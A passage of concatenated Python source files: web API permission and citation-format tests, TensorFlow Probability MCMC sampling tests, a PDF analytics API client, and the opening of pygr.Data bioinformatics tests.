assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_contrib_public(self):
res, citation = self.request(is_contrib=False)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_contrib_private(self):
res, citation = self.request(public=False,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
def test_get_citation_logged_out_public(self):
res, citation = self.request(logged_out=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_logged_out_private(self):
res, citation = self.request(public=False,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
def test_get_citation_admin_not_found_public(self):
res, citation = self.request(is_admin=True,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_admin_not_found_private(self):
res, citation = self.request(public=False,
is_admin=True,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_non_admin_not_found_public(self):
res, citation = self.request(bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_non_admin_not_found_private(self):
res, citation = self.request(public=False,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_non_contrib_not_found_public(self):
res, citation = self.request(is_contrib=False,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_non_contrib_not_found_private(self):
res, citation = self.request(public=False,
is_contrib=False,
bad=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
def test_get_citation_logged_out_not_found_public(self):
res, citation = self.request(logged_out=True,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
def test_get_citation_logged_out_not_found_private(self):
res, citation = self.request(public=False,
logged_out=True,
bad=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
def test_get_citation_admin_public_reg(self):
res, citation = self.request(registration=True,
is_admin=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_admin_private_reg(self):
res, citation = self.request(public=False,
registration=True,
is_admin=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_admin_public_reg(self):
res, citation = self.request(registration=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_admin_private_reg(self):
res, citation = self.request(public=False,
registration=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_contrib_public_reg(self):
res, citation = self.request(registration=True,
is_contrib=False)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_contrib_private_reg(self):
res, citation = self.request(public=False,
registration=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
def test_get_citation_logged_out_public_reg(self):
res, citation = self.request(registration=True,
logged_out=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_logged_out_private_reg(self):
res, citation = self.request(public=False,
registration=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
class TestManualCitationCorrections(ApiTestCase):
def setUp(self):
super(TestManualCitationCorrections, self).setUp()
self.user = AuthUserFactory()
self.project = ProjectFactory(creator=self.user, is_public=True, title="My Project")
def test_apa_citation(self):
citation = citation_utils.render_citation(self.project, 'apa')
expected_citation = self.user.family_name + ', ' + self.user.given_name_initial + '. (' + \
self.project.date_created.strftime("%Y, %B %-d") + '). ' + self.project.title + \
'. Retrieved from ' + self.project.display_absolute_url
assert_equal(citation, expected_citation)
def test_mla_citation(self):
csl = self.project.csl
citation = citation_utils.render_citation(self.project, 'modern-language-association')
expected_citation = csl['author'][0]['family'] + ', ' + csl['author'][0]['given'] + '. ' + u"\u201c" + csl['title'] + '.' + u"\u201d" + ' ' +\
csl['publisher'] + ', ' + self.project.date_created.strftime("%-d %b. %Y. Web.")
assert_equal(citation, expected_citation)
def test_chicago_citation(self):
csl = self.project.csl
citation = citation_utils.render_citation(self.project, 'chicago-author-date')
expected_citation = csl['author'][0]['family'] + ', ' + csl['author'][0]['given'] + '. ' + str(csl['issued']['date-parts'][0][0]) + '. ' + u"\u201c" + csl['title'] + '.' + u"\u201d" + ' ' + csl['publisher'] +'. ' + self.project.date_created.strftime("%B %-d") + '. ' + csl['URL'] + '.'
assert_equal(citation, expected_citation)
|
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for MCMC drivers (e.g., `sample_chain`)."""
import collections
import warnings
# Dependency imports
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import samplers
from tensorflow_probability.python.internal import tensorshape_util
from tensorflow_probability.python.internal import test_util
tfb = tfp.bijectors
tfd = tfp.distributions
NUMPY_MODE = False
TestTransitionKernelResults = collections.namedtuple(
'TestTransitionKernelResults', 'counter_1, counter_2')
class TestTransitionKernel(tfp.mcmc.TransitionKernel):
"""Fake deterministic `TransitionKernel` for testing purposes."""
def __init__(self, is_calibrated=True, accepts_seed=True):
self._is_calibrated = is_calibrated
self._accepts_seed = accepts_seed
def one_step(self, current_state, previous_kernel_results, seed=None):
if seed is not None and not self._accepts_seed:
raise TypeError('seed arg not accepted')
return current_state + 1, TestTransitionKernelResults(
counter_1=previous_kernel_results.counter_1 + 1,
counter_2=previous_kernel_results.counter_2 + 2)
def bootstrap_results(self, current_state):
return TestTransitionKernelResults(counter_1=0, counter_2=0)
@property
def is_calibrated(self):
return self._is_calibrated
class RandomTransitionKernel(tfp.mcmc.TransitionKernel):
"""Fake `TransitionKernel` that randomly assigns the next state.
Regardless of the current state, the `one_step` method will always
randomly sample from a Rayleigh Distribution.
"""
def __init__(self, is_calibrated=True, accepts_seed=True):
self._is_calibrated = is_calibrated
self._accepts_seed = accepts_seed
def one_step(self, current_state, previous_kernel_results, seed=None):
if seed is not None and not self._accepts_seed:
raise TypeError('seed arg not accepted')
random_next_state = tfp.random.rayleigh(current_state.shape, seed=seed)
return random_next_state, previous_kernel_results
@property
def is_calibrated(self):
return self._is_calibrated
@test_util.test_all_tf_execution_regimes
class SampleChainTest(test_util.TestCase):
def setUp(self):
self._shape_param = 5.
self._rate_param = 10.
super(SampleChainTest, self).setUp()
@test_util.numpy_disable_gradient_test('HMC')
def testChainWorksCorrelatedMultivariate(self):
dtype = np.float32
true_mean = dtype([0, 0])
true_cov = dtype([[1, 0.5],
[0.5, 1]])
true_cov_chol = np.linalg.cholesky(true_cov)
num_results = 3000
counter = collections.Counter()
def target_log_prob(x, y):
counter['target_calls'] += 1
# Corresponds to unnormalized MVN.
# z = matmul(inv(chol(true_cov)), [x, y] - true_mean)
z = tf.stack([x, y], axis=-1) - true_mean
z = tf.linalg.triangular_solve(true_cov_chol, z[..., tf.newaxis])[..., 0]
return -0.5 * tf.reduce_sum(z**2., axis=-1)
states = tfp.mcmc.sample_chain(
num_results=num_results,
current_state=[dtype(-2), dtype(2)],
kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob,
step_size=[0.5, 0.5],
num_leapfrog_steps=2),
num_burnin_steps=200,
num_steps_between_results=1,
trace_fn=None,
seed=test_util.test_seed())
if not tf.executing_eagerly():
self.assertAllEqual(dict(target_calls=2), counter)
states = tf.stack(states, axis=-1)
self.assertEqual(num_results, tf.compat.dimension_value(states.shape[0]))
sample_mean = tf.reduce_mean(states, axis=0)
x = states - sample_mean
sample_cov = tf.matmul(x, x, transpose_a=True) / dtype(num_results)
sample_mean_, sample_cov_ = self.evaluate([sample_mean, sample_cov])
self.assertAllClose(true_mean, sample_mean_,
atol=0.1, rtol=0.)
self.assertAllClose(true_cov, sample_cov_,
atol=0., rtol=0.175)
def testBasicOperation(self):
kernel = TestTransitionKernel()
samples, kernel_results = tfp.mcmc.sample_chain(
num_results=2, current_state=0, kernel=kernel,
seed=test_util.test_seed())
self.assertAllClose(
[2], tensorshape_util.as_list(samples.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_1.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_2.shape))
samples, kernel_results = self.evaluate([samples, kernel_results])
self.assertAllClose([1, 2], samples)
self.assertAllClose([1, 2], kernel_results.counter_1)
self.assertAllClose([2, 4], kernel_results.counter_2)
def testBurnin(self):
kernel = TestTransitionKernel()
samples, kernel_results = tfp.mcmc.sample_chain(
num_results=2, current_state=0, kernel=kernel, num_burnin_steps=1,
seed=test_util.test_seed())
self.assertAllClose([2], tensorshape_util.as_list(samples.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_1.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_2.shape))
samples, kernel_results = self.evaluate([samples, kernel_results])
self.assertAllClose([2, 3], samples)
self.assertAllClose([2, 3], kernel_results.counter_1)
self.assertAllClose([4, 6], kernel_results.counter_2)
def testThinning(self):
kernel = TestTransitionKernel()
samples, kernel_results = tfp.mcmc.sample_chain(
num_results=2,
current_state=0,
kernel=kernel,
num_steps_between_results=2,
seed=test_util.test_seed())
self.assertAllClose([2], tensorshape_util.as_list(samples.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_1.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(kernel_results.counter_2.shape))
samples, kernel_results = self.evaluate([samples, kernel_results])
self.assertAllClose([1, 4], samples)
self.assertAllClose([1, 4], kernel_results.counter_1)
self.assertAllClose([2, 8], kernel_results.counter_2)
def testDefaultTraceNamedTuple(self):
kernel = TestTransitionKernel()
res = tfp.mcmc.sample_chain(num_results=2, current_state=0, kernel=kernel,
seed=test_util.test_seed())
self.assertAllClose([2], tensorshape_util.as_list(res.all_states.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(res.trace.counter_1.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(res.trace.counter_2.shape))
res = self.evaluate(res)
self.assertAllClose([1, 2], res.all_states)
self.assertAllClose([1, 2], res.trace.counter_1)
self.assertAllClose([2, 4], res.trace.counter_2)
def testNoTraceFn(self):
kernel = TestTransitionKernel()
samples = tfp.mcmc.sample_chain(
num_results=2, current_state=0, kernel=kernel, trace_fn=None,
seed=test_util.test_seed())
self.assertAllClose([2], tensorshape_util.as_list(samples.shape))
samples = self.evaluate(samples)
self.assertAllClose([1, 2], samples)
def testCustomTrace(self):
kernel = TestTransitionKernel()
res = tfp.mcmc.sample_chain(
num_results=2,
current_state=0,
kernel=kernel,
trace_fn=lambda *args: args,
seed=test_util.test_seed())
self.assertAllClose([2], tensorshape_util.as_list(res.all_states.shape))
self.assertAllClose([2], tensorshape_util.as_list(res.trace[0].shape))
self.assertAllClose(
[2], tensorshape_util.as_list(res.trace[1].counter_1.shape))
self.assertAllClose(
[2], tensorshape_util.as_list(res.trace[1].counter_2.shape))
res = self.evaluate(res)
self.assertAllClose([1, 2], res.all_states)
self.assertAllClose([1, 2], res.trace[0])
self.assertAllClose([1, 2], res.trace[1].counter_1)
self.assertAllClose([2, 4], res.trace[1].counter_2)
def testCheckpointing(self):
kernel = TestTransitionKernel()
res = tfp.mcmc.sample_chain(
num_results=2,
current_state=0,
kernel=kernel,
trace_fn=None,
return_final_kernel_results=True,
seed=test_util.test_seed())
self.assertAllClose([2], tensorshape_util.as_list(res.all_states.shape))
self.assertEqual((), res.trace)
self.assertAllClose(
[], tensorshape_util.as_list(res.final_kernel_results.counter_1.shape))
self.assertAllClose(
[], tensorshape_util.as_list(res.final_kernel_results.counter_2.shape))
res = self.evaluate(res)
self.assertAllClose([1, 2], res.all_states)
self.assertAllClose(2, res.final_kernel_results.counter_1)
self.assertAllClose(4, res.final_kernel_results.counter_2)
def testWarningsDefault(self):
with warnings.catch_warnings(record=True) as triggered:
kernel = TestTransitionKernel()
tfp.mcmc.sample_chain(num_results=2, current_state=0, kernel=kernel,
seed=test_util.test_seed())
self.assertTrue(
any('Tracing all kernel results by default is deprecated' in str(
warning.message) for warning in triggered))
def testNoWarningsExplicit(self):
with warnings.catch_warnings(record=True) as triggered:
kernel = TestTransitionKernel()
tfp.mcmc.sample_chain(
num_results=2,
current_state=0,
kernel=kernel,
trace_fn=lambda current_state, kernel_results: kernel_results,
seed=test_util.test_seed())
self.assertFalse(
any('Tracing all kernel results by default is deprecated' in str(
warning.message) for warning in triggered))
def testIsCalibrated(self):
with warnings.catch_warnings(record=True) as triggered:
kernel = TestTransitionKernel(False)
tfp.mcmc.sample_chain(
num_results=2,
current_state=0,
kernel=kernel,
trace_fn=lambda current_state, kernel_results: kernel_results,
seed=test_util.test_seed())
self.assertTrue(
any('supplied `TransitionKernel` is not calibrated.' in str(
warning.message) for warning in triggered))
@test_util.jax_disable_test_missing_functionality('no tf.TensorSpec')
@test_util.numpy_disable_test_missing_functionality('no tf.TensorSpec')
def testReproduceBug159550941(self):
# Reproduction for b/159550941.
input_signature = [tf.TensorSpec([], tf.int32)]
@tf.function(input_signature=input_signature)
def sample(chains):
initial_state = tf.zeros([chains, 1])
def log_prob(x):
return tf.reduce_sum(tfp.distributions.Normal(0, 1).log_prob(x), -1)
kernel = tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=log_prob,
num_leapfrog_steps=3,
step_size=1e-3)
return tfp.mcmc.sample_chain(
num_results=5,
num_burnin_steps=4,
current_state=initial_state,
kernel=kernel,
trace_fn=None)
# Checking that shape inference doesn't fail.
sample(2)
def testSeedReproducibility(self):
first_fake_kernel = RandomTransitionKernel()
second_fake_kernel = RandomTransitionKernel()
seed = samplers.sanitize_seed(test_util.test_seed())
first_final_state = tfp.mcmc.sample_chain(
num_results=5,
current_state=0.,
kernel=first_fake_kernel,
seed=seed,
)
second_final_state = tfp.mcmc.sample_chain(
num_results=5,
current_state=1., # difference should be irrelevant
kernel=second_fake_kernel,
seed=seed,
)
first_final_state, second_final_state = self.evaluate([
first_final_state, second_final_state
])
self.assertAllCloseNested(
first_final_state, second_final_state, rtol=1e-6)
@parameterized.named_parameters(
dict(testcase_name='RWM_tuple',
kernel_from_log_prob=tfp.mcmc.RandomWalkMetropolis,
sample_dtype=(tf.float32,) * 4),
dict(testcase_name='RWM_namedtuple',
kernel_from_log_prob=tfp.mcmc.RandomWalkMetropolis),
dict(testcase_name='HMC_tuple',
kernel_from_log_prob=lambda lp_fn: tfp.mcmc.HamiltonianMonteCarlo( # pylint: disable=g-long-lambda
lp_fn, step_size=0.1, num_leapfrog_steps=10),
skip='HMC requires gradients' if NUMPY_MODE else '',
sample_dtype=(tf.float32,) * 4),
dict(testcase_name='HMC_namedtuple',
kernel_from_log_prob=lambda lp_fn: tfp.mcmc.HamiltonianMonteCarlo( # pylint: disable=g-long-lambda
lp_fn, step_size=0.1, num_leapfrog_steps=10),
skip='HMC requires gradients' if NUMPY_MODE else ''),
dict(testcase_name='NUTS_tuple',
kernel_from_log_prob=lambda lp_fn: tfp.mcmc.NoUTurnSampler( # pylint: disable=g-long-lambda
lp_fn, step_size=0.1),
skip='NUTS requires gradients' if NUMPY_MODE else '',
sample_dtype=(tf.float32,) * 4),
dict(testcase_name='NUTS_namedtuple',
kernel_from_log_prob=lambda lp_fn: tfp.mcmc.NoUTurnSampler( # pylint: disable=g-long-lambda
lp_fn, step_size=0.1),
skip='NUTS requires gradients' if NUMPY_MODE else '')
)
def testStructuredState(self, kernel_from_log_prob, skip='',
**model_kwargs):
if skip:
self.skipTest(skip)
seed_stream = test_util.test_seed_stream()
n = 300
p = 50
x = tf.random.normal([n, p], seed=seed_stream())
def beta_proportion(mu, kappa):
return tfd.Beta(concentration0=mu * kappa,
concentration1=(1 - mu) * kappa)
root = tfd.JointDistributionCoroutine.Root
def model_coroutine():
beta = yield root(tfd.Sample(tfd.Normal(0, 1), [p], name='beta'))
alpha = yield root(tfd.Normal(0, 1, name='alpha'))
kappa = yield root(tfd.Gamma(1, 1, name='kappa'))
mu = tf.math.sigmoid(alpha[..., tf.newaxis] +
tf.einsum('...p,np->...n', beta, x))
yield tfd.Independent(beta_proportion(mu, kappa[..., tf.newaxis]),
reinterpreted_batch_ndims=1,
name='prob')
model = tfd.JointDistributionCoroutine(model_coroutine, **model_kwargs)
probs = model.sample(seed=seed_stream())[-1]
pinned = model.experimental_pin(prob=probs)
kernel = kernel_from_log_prob(pinned.unnormalized_log_prob)
nburnin = 5
if not isinstance(kernel, tfp.mcmc.RandomWalkMetropolis):
kernel = tfp.mcmc.SimpleStepSizeAdaptation(
kernel, num_adaptation_steps=nburnin // 2)
kernel = tfp.mcmc.TransformedTransitionKernel(
kernel, pinned.experimental_default_event_space_bijector())
nchains = 4
@tf.function
def sample():
return tfp.mcmc.sample_chain(
1, current_state=pinned.sample_unpinned(nchains, seed=seed_stream()),
kernel=kernel, num_burnin_steps=nburnin, trace_fn=None,
seed=seed_stream())
self.evaluate(sample())
@test_util.jax_disable_test_missing_functionality('PHMC b/175107050')
@test_util.numpy_disable_gradient_test('HMC')
def testStructuredState2(self):
@tfd.JointDistributionCoroutineAutoBatched
def model():
mu = yield tfd.Sample(tfd.Normal(0, 1), [65], name='mu')
sigma = yield tfd.Sample(tfd.Exponential(1.), [65], name='sigma')
beta = yield tfd.Sample(
tfd.Normal(loc=tf.gather(mu, tf.range(436) % 65, axis=-1),
scale=tf.gather(sigma, tf.range(436) % 65, axis=-1)),
4, name='beta')
_ = yield tfd.Multinomial(total_count=100.,
logits=tfb.Pad([[0, 1]])(beta),
name='y')
stream = test_util.test_seed_stream()
pinned = model.experimental_pin(y=model.sample(seed=stream()).y)
struct = pinned.dtype
stddevs = struct._make([
tf.fill([65], .1), tf.fill([65], 1.), tf.fill([436, 4], 10.)])
momentum_dist = tfd.JointDistributionNamedAutoBatched(
struct._make(tfd.Normal(0, 1 / std) for std in stddevs))
kernel = tfp.experimental.mcmc.PreconditionedHamiltonianMonteCarlo(
pinned.unnormalized_log_prob,
step_size=.1, num_leapfrog_steps=10,
momentum_distribution=momentum_dist)
bijector = pinned.experimental_default_event_space_bijector()
kernel = tfp.mcmc.TransformedTransitionKernel(kernel, bijector)
pullback_shape = bijector.inverse_event_shape(pinned.event_shape)
kernel = tfp.experimental.mcmc.DiagonalMassMatrixAdaptation(
kernel,
initial_running_variance=struct._make(
tfp.experimental.stats.RunningVariance.from_shape(t)
for t in pullback_shape))
state = bijector(struct._make(
tfd.Uniform(-2., 2.).sample(shp)
for shp in bijector.inverse_event_shape(pinned.event_shape)))
self.evaluate(tfp.mcmc.sample_chain(
3, current_state=state, kernel=kernel, seed=stream()).all_states)
if __name__ == '__main__':
test_util.main()
|
|
#!/usr/bin/env python
"""
---------------------
PDF Analytics Client
---------------------
The PDF Analytics Client is a high level module that enables the verification of the images and text of a
local PDF file.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import time
from pdf_analytics_client.api_request import APIRequest
class JobClass:
"""Basic PDF analysis Job class """
def __init__(self, id, client):
self.id = id
self.__client = client
def wait_analysis_to_complete(self):
"""Wait for the PDF analysis to complete
After you submit the PDF to PDF Analytics website, the takes some seconds until
it is ready to be used for verification.
:return: If the analysis is completed and returns *True* else if in 20 seconds the job is
not complete, returns *False*
:rtype: bool
"""
count = 0
while self.get_status() == 'In Progress' and count < 10:
time.sleep(3)
count += 1
final_status = self.get_status()
if final_status == 'In Progress':
return False
else:
return True
def get_status(self):
"""Get the status of the PDF analysis
:return: The analysis status as string. The string can be "In progress", "Error" or "Complete"
:rtype: str
"""
_, response = self.__client.send_get(uri='job/{id}/get_status/'.format(id=self.id))
return response['status']
def verify_image(self, path, left, top, page, compare_method="pbp", tolerance=0.0):
""" Verify a local image file exists in the PDF
:param path: The absolute or relative path of the locally stored image e.g. '/User/tester/apple.png'
:param left: Distance from the *left* of the page in *points*. Accepts single integer. e.g. 150
:param top: Distance from the *top* of the page in *points*. Accepts single integer. e.g 200
:param page: Number of page, e.g. an integer 4 or a string 'all', 'last', '1-4'
:param compare_method: Image comparison method
:param tolerance: Comparison tolerance. Default value 0.0. Example: 0.02
:return: If the request is successful it returns 200. If it is not successful it returns the error message.
:rtype: JSON
"""
request_json = {
'id': int(self.id),
'page': str(page),
'top': int(top),
'left': int(left),
'compare_method': compare_method,
'tolerance': tolerance
}
full_path = os.path.abspath(path)
file_name = os.path.basename(full_path)
files = {'image_file': (file_name, open(full_path, 'rb'))}
status_code, response = self.__client.send_post(uri='job/verify_image/', data=request_json, ofile=files)
return response
def verify_pdf(self, path, excluded_areas='', tolerance=0.0):
""" Verify a local PDF file with the uploaded job's PDF
:param path: The absolute or relative path of the locally stored PDF ilfe e.g. '/User/tester/report.pdf'
:param excluded_areas: Excluded areas. List field. Example : [
{'left':146, 'top':452, 'width':97, 'height':13,'page':2},
{'left': 414, 'top': 747, 'width': 45, 'height': 16, 'page': 'all'},]
:param tolerance: Comparison tolerance. Default value 0.0. Example: 0.02
:return: If the request is successful it returns 200. If it is not successful it returns the error message.
:rtype: JSON
"""
request_json = {
'id': int(self.id),
'excluded_areas': excluded_areas,
'tolerance': tolerance
}
full_path = os.path.abspath(path)
file_name = os.path.basename(full_path)
files = {'pdf_file': (file_name, open(full_path, 'rb'))}
status_code, response = self.__client.send_post(uri='job/verify_pdf/', data=request_json, ofile=files)
return response
def verify_text(self, text, left, top, page, method='contains'):
""" Verify a text exists in the PDF
:param text: The expected textural content. Accepts string. e.g. 'This is the expected text'
:param left: Distance from the *left* of the page in *points*. Accepts single integer. e.g. 150
:param top: Distance from the *top* of the page in *points*. Accepts single integer. e.g 200
:param page: Number of page, e.g. an integer 4 or a string 'all', 'last', '1-4'
:param method: Text comparison method
:return: If the request is successful it returns 200. If it is not successful it returns the error message.
"""
text_comparison_method = {
'contains': 'contains',
'ends_with': 'ends_with',
'starts_with': 'starts_with',
'exact_content': 'exact_content'
}
request_json = {
'id': int(self.id),
'page': str(page),
'expected_text': str(text),
'method': text_comparison_method.get(method),
'top': int(top),
'left': int(left)
}
_, response = self.__client.send_get(uri='job/verify_text/', data=request_json)
return response
def get_item(self, left, top, page, type='any'):
"""Get any item from the PDF (TODO: get figure)
:param left: Distance from the *left* of the page in *points*. Accepts single integer. e.g. 150
:param top: Distance from the *top* of the page in *points*. Accepts single integer. e.g 200
:param page: Number of page, e.g. 4
:param type: Type of the the item.
:return: A JSON object with the item's information
"""
request_json = {
'id': int(self.id),
'page': int(page),
'type': type,
'top': int(top),
'left': int(left)
}
_, response = self.__client.send_get(uri='find_content/', data=request_json)
return list(response.values())[0]
def get_metadata(self):
"""Get the metadata of the PDF
:return: A JSON object with the metadata of the PDF
"""
_, response = self.__client.send_get(uri='job/{id}/metadata/'.format(id=self.id))
return response
class APIClient:
"""Main API client class"""
def __init__(self, token, url='https://pdf-analytics.com/api/'):
self.client = APIRequest(token=token, url=url)
def create_job(self, local_file, wait_to_complete=True):
"""Create a PDF analysis job
:param local_file: the path of the local PDF file that needs to be uploaded to the server for the analysis
:param wait_to_complete: wait for the PDF analysis to complete. Default value is True.
:return: The JobClass object,
"""
file_name = os.path.basename(local_file)
files = {'file': (file_name, open(local_file, 'rb'))}
_, response = self.client.send_post(uri='job/upload/', ofile=files)
job_obj = JobClass(id=int(response['id']), client=self.client)
if wait_to_complete:
job_obj.wait_analysis_to_complete()
return job_obj
def get_job(self, job_id):
"""Get PDF analysis job
:param job_id: the PDF analysis job ID
:return: The JobClass object,
"""
job_obj = JobClass(id=int(job_id), client=self.client)
return job_obj
def get_account_details(self):
"""Get my account details
:return: a dictionary object with the user's account details
{ 'max_pdf_size_mb': 3,
'daily_max_count': 10,
'today_remaining': 4,
}
"""
_, response = self.client.send_get(uri='account_details/')
return response
|
|
import socket, unittest, os, md5, pickle, datetime
import warnings
import testlib
from testlib import testutil, SkipTest, PygrTestProgram
from pygr import seqdb, cnestedlist, mapping
from pygr.downloader import SourceURL, GenericBuilder
warnings.simplefilter("ignore")
import pygr.Data
warnings.simplefilter("default")
try:
set
except NameError:
from sets import Set as set
class TestBase(unittest.TestCase):
"A base class to all pygr.Data test classes"
def setUp(self, pygrDataPath=None, **kwargs):
# overwrite the WORLDBASEPATH environment variable
self.tempdir = testutil.TempDir('pygrdata')
if pygrDataPath is None:
pygrDataPath = self.tempdir.path
pygr.Data.clear_cache() # make sure no old data loaded
pygr.Data.update(pygrDataPath, **kwargs) # use this path
# handy shortcuts
self.EQ = self.assertEqual
class Download_Test(TestBase):
"Save seq db and interval to pygr.Data shelve"
# tested elsewhere as well, on Linux makes gzip ask for permissions
# to overwrite
def test_download(self):
"Downloading of gzipped file using pygr.Data"
url = SourceURL('http://www.doe-mbi.ucla.edu/~leec/test.gz')
url.__doc__ = 'test download'
pygr.Data.addResource('Bio.Test.Download1', url)
pygr.Data.save()
# performs the download
fpath = pygr.Data.Bio.Test.Download1()
h = testutil.get_file_md5(fpath)
self.assertEqual(h.hexdigest(), 'f95656496c5182d6cff9a56153c9db73')
os.remove(fpath)
class GenericBuild_Test(TestBase):
def test_generic_build(self):
"GenericBuilder construction of the BlastDB"
sp_hbb1 = testutil.datafile('sp_hbb1')
gb = GenericBuilder('BlastDB', sp_hbb1)
s = pickle.dumps(gb)
db = pickle.loads(s) # force construction of the BlastDB
self.EQ(len(db), 24)
found = [x for x in db]
found.sort()
expected = ['HBB0_PAGBO', 'HBB1_ANAMI', 'HBB1_CYGMA', 'HBB1_IGUIG',
'HBB1_MOUSE', 'HBB1_ONCMY', 'HBB1_PAGBO', 'HBB1_RAT',
'HBB1_SPHPU', 'HBB1_TAPTE', 'HBB1_TORMA', 'HBB1_TRICR',
'HBB1_UROHA', 'HBB1_VAREX', 'HBB1_XENBO', 'HBB1_XENLA',
'HBB1_XENTR', 'MYG_DIDMA', 'MYG_ELEMA', 'MYG_ERIEU',
'MYG_ESCGI', 'MYG_GALCR', 'PRCA_ANASP', 'PRCA_ANAVA']
expected.sort()
self.EQ(expected, found)
class DNAAnnotation_Test(TestBase):
def setUp(self,**kwargs):
TestBase.setUp(self)
dnaseq = testutil.datafile('dnaseq.fasta')
tryannot = testutil.tempdatafile('tryannot')
db = seqdb.BlastDB(dnaseq)
try:
db.__doc__ = 'little dna'
pygr.Data.Bio.Test.dna = db
annoDB = seqdb.AnnotationDB({1:('seq1',5,10,'fred'),
2:('seq1',-60,-50,'bob'),
3:('seq2',-20,-10,'mary')},
db,
sliceAttrDict=dict(id=0, start=1, stop=2,
name=3))
annoDB.__doc__ = 'trivial annotation'
pygr.Data.Bio.Test.annoDB = annoDB
nlmsa = cnestedlist.NLMSA(tryannot,'w',pairwiseMode=True,
bidirectional=False)
try:
for annID in annoDB:
nlmsa.addAnnotation(annoDB[annID])
nlmsa.build()
nlmsa.__doc__ = 'trivial map'
pygr.Data.Bio.Test.map = nlmsa
pygr.Data.schema.Bio.Test.map = \
pygr.Data.ManyToManyRelation(db, annoDB,bindAttrs=('exons',))
pygr.Data.save()
pygr.Data.clear_cache()
finally:
nlmsa.close()
finally:
db.close()
def test_annotation(self):
"Annotation test"
db = pygr.Data.Bio.Test.dna()
try:
s1 = db['seq1']
l = s1.exons.keys()
annoDB = pygr.Data.Bio.Test.annoDB()
assert l == [annoDB[1], -(annoDB[2])]
assert l[0].sequence == s1[5:10]
assert l[1].sequence == s1[50:60]
assert l[0].name == 'fred','test annotation attribute access'
assert l[1].name == 'bob'
sneg = -(s1[:55])
l = sneg.exons.keys()
assert l == [annoDB[2][5:], -(annoDB[1])]
assert l[0].sequence == -(s1[50:55])
assert l[1].sequence == -(s1[5:10])
assert l[0].name == 'bob'
assert l[1].name == 'fred'
finally:
db.close() # close SequenceFileDB
pygr.Data.Bio.Test.map().close() # close NLMSA
def populate_swissprot():
"Populate the current pygrData with swissprot data"
# build BlastDB out of the sequences
